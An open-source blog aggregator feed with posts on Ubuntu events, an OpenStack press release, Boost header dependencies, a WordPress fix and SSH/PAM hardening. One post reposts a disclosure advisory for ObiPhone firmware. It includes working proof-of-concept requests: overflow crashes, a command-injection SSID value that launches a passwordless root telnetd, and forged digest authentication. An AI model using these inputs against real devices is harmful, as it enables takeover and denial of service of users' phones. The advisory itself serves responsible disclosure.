Posted 1 day ago
Well, hello there, people. I am back with another Bacon Roundup, which summarizes some of the various things I have published recently. Don’t forget to subscribe to get the latest posts right to your inbox. Also, don’t forget that I am doing a Reddit AMA (Ask Me Anything) on Tuesday 30th August 2016 at 9am Pacific. Find out the details here. Without further ado, the roundup:

Building a Career in Open Source: A piece I wrote about how to build a successful career in open source. It delves into finding opportunity, building a network, always learning and evolving, and more. If you aspire to work in open source, be sure to check it out.

Cutting the Cord With Playstation Vue: At home we recently severed ties with DirecTV (for lots of reasons) and moved our entertainment to a Playstation 4 and Playstation Vue for TV. Here’s how I did it, how it works, and how you can get in on the action.

Running a Hackathon for Security Hackers: I have been working with HackerOne, and we recently ran a hackathon for some of the best hackers in the world to hack popular products and services for fun and profit. Here’s what happened, how it looked, and what went down.

Opening Up Data Science: Recently I have also been working with a company that is building a global platform and community for data, collaboration, and insights. This piece delves into the importance of data and what the future might hold for a true data community.

From The Archive

To round out this roundup, here are a few pieces I published from the archive. As usual, you can find more here.

Using behavioral patterns to build awesome communities: Human beings are pretty irrational a lot of the time, but irrational in predictable ways. These traits can provide a helpful foundation on which to build human systems and communities. This piece delves into some practical ways in which you can harness behavioral economics in your community or organization.

Atom: My New Favorite Code Editor: Atom is an extensible text editor that provides a thin and sleek core and a raft of community-developed plugins for expanding it into the editor you want. Want it like vim? No worries. Want it like Eclipse? No worries. Here’s my piece on why it is neat and recommendations for which plugins you should install.

Ultimate unconference survival guide: Unconferences, for those who are new to them, are conferences in which the attendees define the content on the fly. They provide a phenomenal way to bring fresh ideas to the surface. They can, though, be a little complicated to figure out for attendees. Here are some tips on getting the most out of them.

Stay up to date and get the latest posts direct to your email inbox with no spam and no nonsense. Click here to subscribe. The post Bacon Roundup – 23rd August 2016 appeared first on Jono Bacon.
Posted 2 days ago
Last week I traveled to Philadelphia to spend some time with friends and speak at FOSSCON. While I was there, I noticed a Philadelphia area Linux Users Group (PLUG) meeting would land during that week and decided to propose a talk on Ubuntu 16.04.

But first, I happened to be out getting my nails done with a friend on Sunday before my talk. Since I was there, I decided to Ubuntu-theme things up again. Drawing freehand, the manicurist gave me some lovely Ubuntu logos.

Girly nails aside, that’s how I ended up at The ATS Group on Monday evening for a PLUG West meeting. They had a very nice welcome sign for the group. Danita and I arrived shortly after 7PM for the Q&A portion of the meeting. This pre-presentation time gave me the opportunity to pass around my BQ Aquaris M10 tablet running Ubuntu. After the first unceremonious pass, I sent it around a second time with more of an introduction, and the Bluetooth keyboard and mouse combo, so people could see convergence in action by switching between the tablet and desktop views. Unlike my previous presentations, I was traveling, so I didn’t have my bag of laptops and extra tablet; that was the extent of the demos.

The meeting was very well attended and the talk went well. It was nice to have folks chiming in on a few of the topics (like the transition to systemd) and there were good questions. I was also able to give away a copy of our The Official Ubuntu Book, 9th Edition to an attendee who was new to Ubuntu. Keith C. Perry shared a video of the talk on G+ here. Slides are similar to past talks, but I added a couple since I was presenting on a Xubuntu system (rather than Ubuntu) and didn’t have pure Ubuntu demos available: slides (7.6M PDF, lots of screenshots).

After the meeting we all had an enjoyable time at The Office, which I hadn’t been to since moving away from Philadelphia almost seven years ago.
Thanks again to everyone who came out; it was nice to meet a few new folks and catch up with a bunch of people I haven’t seen in several years.

Saturday was FOSSCON! The Ubuntu Pennsylvania LoCo team showed up to have a booth, staffed by long-time LoCo member Randy Gold. They had Ubuntu demos, giveaways from the Ubuntu conference pack (lanyards, USB sticks, pins), and I dropped off a copy of the Ubuntu book for people to browse, along with some discount coupons for folks who wanted to buy it. My Ubuntu tablet also spent time at the table so people could play around with it. Thanks to Randy for the booth photo!

At the conference closing, we had three Ubuntu books to raffle off! They seemed to go to people who appreciated them, and since both José and I attended the conference, the raffle winners had two of the three authors there to sign the books. My co-author, José Antonio Rey, signing a copy of our book!
Posted 3 days ago
OVERLAND PARK, KANSAS, and LONDON, U.K. (August 22, 2016) – Responding to increasing demand for flexible, open source and cost-predictable cloud solutions, QTS Realty Trust, Inc. (NYSE: QTS) and Canonical (the company behind Ubuntu, the leading operating system for container, cloud, scale-out, and hyperscale computing) announced today a private, fully managed OpenStack cloud solution available from any of QTS’ geographically diverse and highly secure data centers in mid-September.

Built on Ubuntu OpenStack, the world’s most popular OpenStack distribution, and using Canonical’s application modeling service Juju as well as Canonical’s Metal as a Service (MAAS), QTS’ private, fully managed OpenStack cloud enables enterprise customers to perform quick and easy provisioning, orchestration, and management of cloud resources. Examples include:

- Building software-as-a-service applications, either as new developments or as improvements upon existing solutions.
- Serving as a base for delivering self-service storage and service on demand to users who need IT services.
- Delivering object storage or block storage on demand.
- Saving on licensing fees associated with virtualization technologies.

In addition to the private cloud offering, QTS offers a public, multi-tenant, pay-as-you-go OpenStack cloud solution that is self-provisioning, elastic and highly scalable.

“As a leading data center and IT infrastructure services provider, QTS is focused on delivering seamless hybrid cloud hosting solutions using proven, best-in-breed platform technologies,” said Anand Krishnan, Executive Vice President, Canonical Cloud.
“We are pleased to support QTS’ delivery of OpenStack solutions that combine the rapid availability and elasticity of compute resources with the security and control their enterprise customers demand to support their mission-critical applications and workloads.”

The new OpenStack solution is an important addition to QTS’ expanding portfolio of scalable, secure and compliant IaaS solutions, and complements other QTS purpose-built clouds serving public sector, healthcare and enterprise workloads.

“QTS OpenStack Cloud is the latest addition as we expand our Infrastructure-as-a-Service (IaaS) offerings to create a one-stop shop for flexible IaaS and hybrid IT solutions that address increasingly diverse customer requirements,” said Jon Greaves, Chief Technology Officer, QTS. “Canonical is an industry leader in OpenStack management and technologies and we look forward to working closely as we unleash OpenStack Cloud solutions across our geographically diverse platform of integrated data centers.”

The fully managed cloud solution is being previewed at OpenStack East in New York City, August 23-24, at Canonical booth #H12.
Posted 3 days ago
Note that this is a duplicate of the advisory sent to the full-disclosure mailing list.

Introduction

Multiple vulnerabilities were discovered in the web management interface of the ObiHai ObiPhone products. The vulnerabilities were discovered during a black box security assessment and therefore the vulnerability list should not be considered exhaustive.

Affected Devices and Versions

ObiPhone 1032/1062 with firmware less than 5-0-0-3497.

Vulnerability Overview

Obi-1. Memory corruption leading to free() of an attacker-controlled address
Obi-2. Command injection in WiFi Config
Obi-3. Denial of Service due to buffer overflow
Obi-4. Buffer overflow in internal socket handler
Obi-5. Cross-site request forgery
Obi-6. Failure to implement RFC 2617 correctly
Obi-7. Invalid pointer dereference due to invalid header
Obi-8. Null pointer dereference due to malicious URL
Obi-9. Denial of service due to invalid content-length

Vulnerability Details

Obi-1. Memory corruption leading to free() of an attacker-controlled address

By providing a long URI (longer than 256 bytes) not containing a slash in a request, a pointer is overwritten which is later passed to free(). By controlling the location of the pointer, this would allow an attacker to affect control flow and gain control of the application. Note that the free() seems to occur during cleanup of the request, as a 404 is returned to the user before the segmentation fault.

python -c 'print "GET " + "A"*257 + " HTTP/1.1\nHost: foo"' | nc IP 80

(gdb) bt
#0 0x479d8b18 in free () from root/lib/
#1 0x00135f20 in ?? ()
(gdb) x/5i $pc
=> 0x479d8b18 : ldr r3, [r0, #-4]
   0x479d8b1c : sub r5, r0, #8
   0x479d8b20 : tst r3, #2
   0x479d8b24 : bne 0x479d8bec
   0x479d8b28 : tst r3, #4
(gdb) i r r0
r0  0x41  65

Obi-2. Command injection in WiFi Config

An authenticated user (including the lower-privileged “user” user) can enter a hidden network name similar to “$(/usr/sbin/telnetd &)”, which starts the telnet daemon.
GET /wifi?checkssid=$(/usr/sbin/telnetd%20&) HTTP/1.1
Host: foo
Authorization: [omitted]

Note that telnetd is now running and accessible via user “root” with no password.

Obi-3. Denial of Service due to buffer overflow

By providing a long URI (longer than 256 bytes) beginning with a slash, memory is overwritten beyond the end of mapped memory, leading to a crash. Though no exploitable behavior was observed, it is believed that memory containing information relevant to the request or control flow is likely overwritten in the process. strcpy() appears to write past the end of the stack for the current thread, but it does not appear that there are saved link registers on the stack for the devices under test.

python -c 'print "GET /" + "A"*256 + " HTTP/1.1\nHost: foo"' | nc IP 80

(gdb) bt
#0 0x479dc440 in strcpy () from root/lib/
#1 0x001361c0 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) x/5i $pc
=> 0x479dc440 : strb r3, [r1, r2]
   0x479dc444 : bne 0x479dc438
   0x479dc448 : bx lr
   0x479dc44c : push {r4, r5, r6, lr}
   0x479dc450 : ldrb r3, [r0]
(gdb) i r r1 r2
r1  0xb434df01  3023363841
r2  0xff        255
(gdb) p/x $r1+$r2
$1 = 0xb434e000

Obi-4. Buffer overflow in internal socket handler

Commands to be executed by the realtime backend process obid are sent via Unix domain sockets from obiapp. In formatting the message for the Unix socket, a new string is constructed on the stack. This string can overflow the static buffer, leading to control of program flow. The only vectors leading to this code that were discovered during the assessment were authenticated; however, unauthenticated code paths may exist. Note that the example command can be executed as the lower-privileged “user” user.

GET /wifi?checkssid=[A*1024] HTTP/1.1
Host: foo
Authorization: [omitted]

(gdb)
#0 0x41414140 in ?? ()
#1 0x0006dc78 in ?? ()

Obi-5. Cross-site request forgery

All portions of the web interface appear to lack any protection against Cross-Site Request Forgery.
Combined with the command injection vector in ObiPhone-3, this would allow a remote attacker to execute arbitrary shell commands on the phone, provided the current browser session was logged in to the phone.

Obi-6. Failure to implement RFC 2617 correctly

RFC 2617 specifies HTTP digest authentication, but it is not correctly implemented on the ObiPhone. The HTTP digest authentication fails to comply in the following ways:

- The URI is not validated
- The application does not verify that the nonce received is the one it sent
- The application does not verify that the nc value does not repeat or go backwards

GET / HTTP/1.1
Host: foo
Authorization: Digest username="admin", realm="a", nonce="a", uri="/", algorithm=MD5, response="309091eb609a937358a848ff817b231c", opaque="", qop=auth, nc=00000001, cnonce="a"
Connection: close

HTTP/1.1 200 OK
Server: OBi110
Cache-Control: must-revalidate, no-store, no-cache
Content-Type: text/html
Content-Length: 1108
Connection: close

Please note that the realm, nonce, cnonce, and nc values have all been chosen and the response generated offline.

Obi-7. Invalid pointer dereference due to invalid header

Sending an invalid HTTP Authorization header, such as “Authorization: foo”, causes the program to attempt to read from an invalid memory address, leading to a segmentation fault and reboot of the device. This requires no authentication, only access to the network to which the device is connected.

GET / HTTP/1.1
Host: foo
Authorization: foo

This causes the server to dereference the address 0xFFFFFFFF, presumably returned as a -1 error code.

(gdb) bt
#0 0x479dc438 in strcpy () from root/lib/
#1 0x00134ae0 in ?? ()
(gdb) x/5i $pc
=> 0x479dc438 : ldrb r3, [r1, #1]!
   0x479dc43c : cmp r3, #0
   0x479dc440 : strb r3, [r1, r2]
   0x479dc444 : bne 0x479dc438
   0x479dc448 : bx lr
(gdb) i r r1
r1  0xffffffff  4294967295

Obi-8.
Null pointer dereference due to malicious URL

If the /obihai-xml handler is requested without any trailing slash or component, this leads to a null pointer dereference, crash, and subsequent reboot of the phone. This requires no authentication, only access to the network to which the device is connected.

GET /obihai-xml HTTP/1.1
Host: foo

(gdb) bt
#0 0x479dc7f4 in strlen () from root/lib/
Backtrace stopped: Cannot access memory at address 0x8f6
(gdb) info frame
Stack level 0, frame at 0xbef1aa50:
 pc = 0x479dc7f4 in strlen; saved pc = 0x171830
 Outermost frame: Cannot access memory at address 0x8f6
 Arglist at 0xbef1aa50, args:
 Locals at 0xbef1aa50, Previous frame's sp is 0xbef1aa50
(gdb) x/5i $pc
=> 0x479dc7f4 : ldr r2, [r1], #4
   0x479dc7f8 : ands r3, r0, #3
   0x479dc7fc : rsb r0, r3, #0
   0x479dc800 : beq 0x479dc818
   0x479dc804 : orr r2, r2, #255 ; 0xff
(gdb) i r r1
r1  0x0  0

Obi-9. Denial of service due to invalid content-length

Content-Length headers of -1, -2, or -3 result in a crash and device reboot. This does not appear exploitable to gain execution. Larger (more negative) values return a page stating “Firmware Update Failed”, though it does not appear any attempt to update the firmware with the posted data occurred.

POST / HTTP/1.1
Host: foo
Content-Length: -1

Foo

This appears to write a constant value of 0 to an address controlled by the Content-Length parameter, but since it appears to be relative to a freshly mapped page of memory (perhaps via mmap() or malloc()), it does not appear this can be used to gain control of the application.

(gdb) bt
#0 0x00138250 in HTTPD_msg_proc ()
#1 0x00070138 in ?? ()
(gdb) x/5i $pc
=> 0x138250 : strb r1, [r3, r2]
   0x138254 : ldr r1, [r4, #24]
   0x138258 : ldr r0, [r4, #88] ; 0x58
   0x13825c : bl 0x135a98
   0x138260 : ldr r0, [r4, #88] ; 0x58
(gdb) i r r3 r2
r3  0xafcc7000  2949410816
r2  0xffffffff  4294967295

Mitigation

Upgrade to Firmware 5-0-0-3497 (5.0.0 build 3497) or newer.
Author

The issues were discovered by David Tomaschik of the Google Security Team.

Timeline

2016/05/12 - Reported to ObiHai
2016/05/12 - Findings acknowledged by ObiHai
2016/05/20 - ObiHai reports working on patches for most issues
2016/06/?? - New firmware posted to ObiHai website
2016/08/18 - Public disclosure
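Obi-6 above boils down to the server skipping the verification half of the digest exchange. As a rough sketch (not the ObiPhone code; the password here is a made-up placeholder), this is how an RFC 2617 qop=auth response is computed, and therefore what a compliant server must recompute and compare, in addition to checking that the nonce is one it actually issued and that nc only moves forward:

```python
import hashlib

def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()

def digest_response(user, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    # RFC 2617, qop=auth:
    #   HA1 = MD5(user:realm:password)
    #   HA2 = MD5(method:uri)
    #   response = MD5(HA1:nonce:nc:cnonce:qop:HA2)
    ha1 = md5_hex("%s:%s:%s" % (user, realm, password))
    ha2 = md5_hex("%s:%s" % (method, uri))
    return md5_hex("%s:%s:%s:%s:%s:%s" % (ha1, nonce, nc, cnonce, qop, ha2))

# With the attacker-chosen values from the request shown above (the password
# "hunter2" is a hypothetical placeholder), the response can be precomputed
# entirely offline, because the server never checks the nonce or nc it receives.
resp = digest_response("admin", "a", "hunter2", "GET", "/", "a", "00000001", "a")
print(resp)  # a 32-character hex MD5 digest
```

Since every input to the hash is chosen by the client and never validated, a captured response can be replayed indefinitely, which is exactly the failure mode the advisory describes.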
Posted 3 days ago
A few weeks ago, I hacked up go-wmata, some golang bindings to the WMATA API. This is super handy if you are in the DC area and want to interface to the WMATA data. As a proof of concept, I wrote a Yo bot called @WMATA, which returns the closest station if you Yo it your location. For hilarity, feel free to Yo it from outside DC. For added fun, and puns, I wrote a dbus proxy for the API as well, at wmata-dbus, so you can query the next train over dbus. One thought was to make a GNOME Shell extension to tell me when the next train is. I’d love help with this (or pointers on how to learn how to do this right).
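The closest-station lookup at the heart of that Yo bot can be sketched in a few lines: great-circle distance from the user's location to each station, take the minimum. The station list and coordinates below are illustrative stand-ins, not the actual WMATA API data or the go-wmata interface:

```python
import math

def haversine_km(lat1, lon1, lat2, lon2):
    # Great-circle distance between two (lat, lon) points, in kilometers.
    r = 6371.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = math.radians(lat2 - lat1)
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))

# A few illustrative WMATA stations (coordinates approximate).
STATIONS = {
    "Metro Center": (38.8983, -77.0281),
    "Union Station": (38.8978, -77.0074),
    "Rosslyn": (38.8959, -77.0715),
}

def closest_station(lat, lon):
    return min(STATIONS, key=lambda name: haversine_km(lat, lon, *STATIONS[name]))

# A location near the US Capitol resolves to Union Station.
print(closest_station(38.8899, -77.0091))  # Union Station
```

The real bot would of course pull the full station list (with coordinates) from the WMATA API rather than a hard-coded table.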
Posted 3 days ago
Recently I generated diagrams showing the header dependencies between Boost libraries, or rather, between various Boost git repositories. Diagrams showing dependencies for each individual Boost git repo are here, along with dot files for generating the images. The monster diagram is here.

Edges and Incidental Modules and Packages

The directed edges in the graphs represent that a header file in one repository #includes a header file in the other repository. The idea is that, if a packager wants to package up a Boost repo, they can’t assume anything about how the user will use it. A user of Boost.ICL can choose whether ICL will use Boost.Container or not by manipulating the ICL_USE_BOOST_MOVE_IMPLEMENTATION preprocessor macro. So, the packager has to list Boost.Container as some kind of dependency of Boost.ICL, so that when the package manager downloads the boost-icl package, the boost-container package is automatically downloaded too. The dependency relationship might be a ‘suggests’ or ‘recommends’, but the edge will nonetheless exist somehow.

In practice, packagers do not split Boost into packages like that. At least for Debian packages, they split compiled static libraries into packages such as libboost-serialization1.58, and put all the headers (all header-only libraries) into a single package, libboost1.58-dev. Perhaps the reason for packagers putting it all together is that there is little value in splitting the header-only repository content of the monolithic Boost if it will all be packaged anyway. Or perhaps the sheer number of repositories makes splitting impractical. This is in contrast to KDE Frameworks, which does consider such edges and dependency graph size when determining where functionality belongs. Typically KDE aims to define the core functionality of a library on its own in a loosely coupled way with few dependencies, and then add integration and extension for other types in higher-level libraries (if at all).
Another feature of my diagrams is that repositories which depend circularly on each other are grouped together in what I called ‘incidental modules’. The name is inspired by ‘incidental data structures’, which Sean Parent describes in detail in one of his ‘Better Code’ talks. From a packager’s point of view, the Boost.MPL repo and the Boost.Utility repo are indivisible because at least one header of each repo includes at least one header of the other. That is, even if packagers wanted to split Boost headers in some way, the ‘incidental modules’ would still have to be grouped together into larger packages. As far as I am aware, such circular dependencies don’t fit with Standard C++ Modules designs or the design of Clang Modules, but that part of C++ would have to become more widespread before Boost would consider their impact. There may be no reason to attempt to break these ‘incidental modules’ apart if all that would do is make some graphs nicer; it wouldn’t affect how Boost is packaged.

My script for generating the dependency information simply greps through the include/ directory of each repository and records the #included files in other repositories. This means that while we know Boost.Hana can be used stand-alone, if a packager simply packages up the include/boost/hana directory, the result will have dependencies on parts of Boost, because Hana includes code for integration with existing Boost code.

Dependency Analysis and Reduction

One way of defining a Boost library is to consider the group of headers which are gathered together and documented together to be a library (there are other ways, which some in Boost prefer; it is surprisingly fuzzy). That is useful for documentation at least, but as evidenced it appears not to be useful from a packaging point of view. So, are these diagrams useful for anything?
While Boost header-only libraries are not generally split in standard packaging systems, the bcp tool is provided to allow users to extract a subset of the entire Boost distribution into a user-specified location. As far as I know, the tool scans header files for #include directives (ignoring ifdefs, like a packager would) and gathers together all of the transitively required files. That means that these diagrams are a good measure of how much stuff the bcp tool will extract.

Note also that these edges do not contribute time to your slow build. Reducing edges in the graphs by moving files won’t make anything faster; rewriting the implementation of certain things might, but that is not what we are talking about here.

I can run the tool to generate a usable Boost.ICL which I can easily distribute. I delete the docs, examples and tests from the ICL directory because they make up a large chunk of the size, and such a ‘subset distribution’ doesn’t need any of them. I also remove 3.5M of preprocessed files from MPL. I then need to define BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS when compiling, which is easy and explained at the end:

$ bcp --boost=$HOME/dev/src/boost icl myicl
$ rm -rf myicl/libs/icl/{doc,test,example}
$ rm -rf myicl/boost/mpl/aux_/preprocessed
$ du -hs myicl/
15M myicl/

Ok, so it’s pretty big. Looking at the dependency diagram for Boost.ICL, you can see an arrow to the ‘incidental spirit’ module. Looking at the Boost.Spirit dependency diagram, you can see that it is quite large. Why does ICL depend on ‘incidental spirit’? Can that dependency be removed?

For those ‘incidental modules’, I selected one of the repositories within the group and named the group after that one repository. To see why ICL depends on ‘incidental spirit’, we have to examine all 5 of the repositories in the group to check which one is responsible for the dependency edge.
boost/libs/icl$ git grep -Pl -e include --and \
    -e "thread|spirit|pool|serial|date_time" include/
include/boost/icl/gregorian.hpp
include/boost/icl/ptime.hpp

Formatting wide terminal output is tricky in a blog post, so I had to make some compromises in the output here. Those ICL headers are including Boost.DateTime headers. I can further see that gregorian.hpp and ptime.hpp are ‘leaf’ files in this analysis; other files in ICL do not include them.

boost/libs/icl$ git grep -l gregorian include/
include/boost/icl/gregorian.hpp
boost/libs/icl$ git grep -l ptime include/
include/boost/icl/ptime.hpp

As it happens, my ICL-using code also does not need those files. I’m only using icl::interval_set and icl::interval_map. So, I can simply delete those files:

boost/libs/icl$ git grep -l -e include \
    --and -e date_time include/boost/icl/ | xargs rm
boost/libs/icl$

and run the bcp tool again.

$ bcp --boost=$HOME/dev/src/boost icl myicl
$ rm -rf myicl/libs/icl/{doc,test,example}
$ rm -rf myicl/boost/mpl/aux_/preprocessed
$ du -hs myicl/
12M myicl/

I’ve saved 3M just by understanding the dependencies a bit. Not bad! Mostly the size difference is accounted for by no longer extracting boost::mpl::vector, and secondly by the Boost.DateTime headers themselves. The dependencies in the graph are now so few that we can consider them and wonder why they are there and whether they can be removed. For example, there is a dependency on the Boost.Container repository. Why is that?

include/boost/icl$ git grep -C2 -e include \
    --and -e boost/container
#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include
--
#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include
#   include
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include
--
#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include

So, Boost.Container is only included if the user defines ICL_USE_BOOST_MOVE_IMPLEMENTATION, and otherwise not.
If we were talking about C++ code here, we might consider this a violation of the Interface Segregation Principle, but we are not, and unfortunately the realities of the preprocessor mean this kind of thing is quite common. I know that I’m not defining that macro and I don’t need Boost.Container, so I can hack the code to remove those includes, e.g.:

index 6f3c851..cf22b91 100644
--- a/include/boost/icl/map.hpp
+++ b/include/boost/icl/map.hpp
@@ -12,12 +12,4 @@ Copyright (c) 2007-2011:
-#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
-# include
-# include
-#elif defined(ICL_USE_STD_IMPLEMENTATION)
 # include
 # include
-#else // Default for implementing containers
-# include
-# include
-#endif

This and the following steps don’t affect the filesystem size of the result. However, we can continue to analyze the dependency graph. I can break apart the ‘incidental fusion’ module by deleting the iterator/zip_iterator.hpp file, removing further dependencies in my custom Boost.ICL distribution. I can also delete the iterator/function_input_iterator.hpp file to remove the dependency on Boost.FunctionTypes. The result is a graph which you can at least reason about being used in an interval tree library like Boost.ICL, quite apart from our starting point with that library.

You might shudder at the thought of deleting zip_iterator if it is an essential tool to you. Partly I want to explore in this blog post what will be needed from Boost in the future when we have zip views from the Ranges TS, or use the existing ranges-v3 directly, for example. In that context, zip_iterator can go.

Another feature of the bcp tool is that it can scan a set of source files and copy only the Boost headers that are included transitively. If I had used that, I wouldn’t need to delete ptime.hpp or gregorian.hpp, because bcp wouldn’t find them in the first place. It would still find the Boost.Container includes which appear in the ICL repository, however.
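The grep-based edge extraction used throughout this analysis (recording which other repositories a repo's headers #include) can be sketched in a few lines of Python. The file extensions and layout here are assumptions, and flat headers such as boost/shared_ptr.hpp would really need a header-to-repository lookup table rather than being skipped:

```python
import os
import re

# Matches '#include <boost/...>' or '#include "boost/..."' and captures the
# first path component after 'boost/', which usually names the repository.
INCLUDE_RE = re.compile(r'^\s*#\s*include\s*[<"]boost/([^/>"]+)', re.MULTILINE)

def included_components(text):
    # Skip flat headers (e.g. boost/shared_ptr.hpp); a real tool would map
    # those to their owning repository with a lookup table.
    return [c for c in INCLUDE_RE.findall(text) if not c.endswith((".hpp", ".h"))]

def repo_edges(repo_name, include_dir):
    """Collect edges repo_name -> other component for every cross-repository
    #include found under include_dir, roughly what the grepping did."""
    edges = set()
    for root, _, files in os.walk(include_dir):
        for fname in files:
            if not fname.endswith((".hpp", ".h", ".ipp")):
                continue
            with open(os.path.join(root, fname), errors="ignore") as fh:
                for comp in included_components(fh.read()):
                    if comp != repo_name:
                        edges.add((repo_name, comp))
    return sorted(edges)

print(included_components('#include <boost/container/map.hpp>'))  # ['container']
```

Feeding the resulting edge sets into dot is then straightforward, which is essentially how the diagrams above were produced.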
In this blog post, I showed an alternative approach to the bcp --scan attempt at minimalism. My attempt is to use bcp to export useful and as-complete-as-possible libraries. I don’t have a lot of experience with bcp, but it seems that in scanning mode I would have to re-run the tool any time I used an ICL header which I had not used before. With the modular approach, it would be less-frequently necessary to run the tool (only when directly using a Boost repository I hadn’t used before), so it seemed an approach worth exploring the limitations of. Examining Proposed Standard Libraries We can also examine other Boost repositories, particularly those which are being standardized by newer C++ standards because we know that any, variant and filesystem can be implemented with only standard C++ features and without Boost. Looking at Boost.Variant, it seems that use of the Boost.Math library makes that graph much larger. If we want Boost.Variant without all of that Math stuff, one thing we can choose to do is copy the one math function that Variant uses, static_lcm, into the Variant library (or somewhere like Boost.Core or Boost.Integer for example). That does cause a significant reduction in the dependency graph. Further, I can remove the hash_variant.hpp file to remove the Boost.Functional dependency: I don’t know if C++ standardized variant has similar hashing functionality or how it is implemented, but it is interesting to me how it affects the graph. Using a bcp-extracted library with Modern CMake After extracting a library or set of libraries with bcp, you might want to use the code in a CMake project. 
Here is the modern way to do that:

add_library(boost_mpl INTERFACE)
target_compile_definitions(boost_mpl INTERFACE
    BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS
)
target_include_directories(boost_mpl INTERFACE
    "${CMAKE_CURRENT_SOURCE_DIR}/myicl"
)

add_library(boost_icl INTERFACE)
target_link_libraries(boost_icl INTERFACE boost_mpl)
target_include_directories(boost_icl INTERFACE
    "${CMAKE_CURRENT_SOURCE_DIR}/myicl/libs/icl/include"
)
add_library(boost::icl ALIAS boost_icl)

Boost ships a large chunk of preprocessed headers for various compilers, which I mentioned above. The reasons for that are probably historical and obsolete, but they will remain, and they are used by default when using GCC; that will not change. To diverge from that default it is necessary to set the BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS preprocessor macro. By defining an INTERFACE boost_mpl library and setting its INTERFACE target_compile_definitions, any user of that library gets that magic BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS define when compiling its sources.

MPL is just an internal implementation detail of ICL though, so I won’t have any of my CMake targets using MPL directly. Instead I additionally define a boost_icl INTERFACE library which specifies an INTERFACE dependency on boost_mpl with target_link_libraries.

The last ‘modern’ step is to define an ALIAS library. The alias name is boost::icl and it aliases the boost_icl library. To CMake, the following two commands generate an equivalent buildsystem:

target_link_libraries(myexe boost_icl)
target_link_libraries(myexe boost::icl)

Using the ALIAS version has a different effect, however: if the boost::icl target does not exist, an error will be issued at CMake time. That is not the case with the boost_icl version. It makes sense to use target_link_libraries with targets with :: in the name, and ALIAS makes that possible for any library.
Posted 3 days ago
If you use WordPress and run into this little error (Abort Class-pclzip.php : Missing Zlib) while importing a slider with Revolution Slider, don’t worry; the fix is as follows. Edit the file inside the wp-admin/includes/ folder:

sudo nano /path-to-your-site/wp-admin/includes/class-pclzip.php

Find the line if (!function_exists('gzopen')) and replace gzopen with gzopen64. With that small change you can keep using the plugin without any problem.

Now, why does this error happen? In recent Ubuntu versions, gzopen (the PHP function that lets us open a .gz compressed file) is only included for the 64-bit architecture, which is why gzopen needs to be replaced with gzopen64 so that we can import all those files compressed in this format. Happy Hacking!
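If you would rather not edit the file by hand, the same one-line change can be scripted. This sketch only rewrites bare gzopen identifiers, so an already-patched file (or names like gzopen64) is left untouched; point it at wherever your class-pclzip.php lives:

```python
import re

def patch_pclzip(source):
    """Replace bare 'gzopen' identifiers with 'gzopen64'.

    The word-boundary match means existing 'gzopen64' references are not
    turned into 'gzopen6464', so the patch is safe to run twice.
    """
    return re.sub(r"\bgzopen\b", "gzopen64", source)

line = "if (!function_exists('gzopen')) {"
print(patch_pclzip(line))  # if (!function_exists('gzopen64')) {
```

To apply it for real, read class-pclzip.php, run it through patch_pclzip, and write the result back (after taking a backup copy).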
Posted 4 days ago by Valorie Zimmerman
Hello, if you are reading this and have some extra money, consider helping out a young friend of mine whose mother needs a better defense attorney. In India, where they live, the resources all seem stacked against her. I've tried to help, and hope you will too.

Himanshu says: Hi, I recently started an online crowdfunding campaign to help my mother with legal funds; she is in the middle of a divorce and domestic violence case. Please support and share this message. Thanks.
Posted 4 days ago
I was setting up some wargame boxes for a private group and wanted to reduce the risk of malfeasance/abuse from these boxes. One option, used by many public wargames, is locking down the firewall. While that’s a great start, I decided to go one step further and prevent directly logging in as the wargame users, requiring that the users of my private wargames have their own accounts.

Step 1: Setup the Private Accounts

This is pretty straightforward: create a group for these users that can SSH directly in, create their accounts, and set up their public keys.

    # groupadd sshusers
    # useradd -G sshusers matir
    # su - matir
    $ mkdir -p .ssh
    $ echo 'AAA...' > .ssh/authorized_keys

Step 2: Configure PAM

This will set up PAM to define who can log in from where. Edit /etc/security/access.conf to look like this:

    # /etc/security/access.conf
    + : (sshusers) : ALL
    + : ALL : LOCAL
    - : ALL : ALL

This allows sshusers to log in from anywhere, and everyone to log in locally. This way, users allowed via SSH log in, then port forward from their machine to the wargame server to connect as a level. Edit /etc/pam.d/sshd to use this by uncommenting (or adding) a line:

    account  required  pam_access.so nodefgroup

Step 3: Configure SSHD

Now we’ll configure SSHD to allow access as needed: passwords locally, keys only from remote hosts, and make sure we use PAM. Ensure the following settings are set:

    UsePAM yes

    Match Host !
        PasswordAuthentication no

Step 4: Test

Restart sshd and you should be able to connect remotely as any user in sshusers, but not as any other user. You should also be able to port forward, then connect with a username/password through the forwarded port.
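One gotcha worth flagging in Step 1: with sshd's default StrictModes, public-key auth silently fails if ~/.ssh or authorized_keys are group- or world-writable, so it pays to set permissions explicitly. A minimal sketch of the key setup with the expected modes (demo_home stands in for the user's real home directory, and the key string is a placeholder):

    # Illustrative sketch: authorized_keys with the permissions sshd's
    # StrictModes checks expect. demo_home is a throwaway stand-in for $HOME.
    demo_home=$(mktemp -d)

    mkdir -p "$demo_home/.ssh"
    chmod 700 "$demo_home/.ssh"          # only the owner may touch .ssh

    # The key below is a placeholder, not a real public key.
    echo 'ssh-ed25519 AAAA... matir@laptop' >> "$demo_home/.ssh/authorized_keys"
    chmod 600 "$demo_home/.ssh/authorized_keys"

With the real home directory in place of demo_home, this matches the mkdir/echo steps above but won't trip the StrictModes check on a fresh account.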
Posted 5 days ago
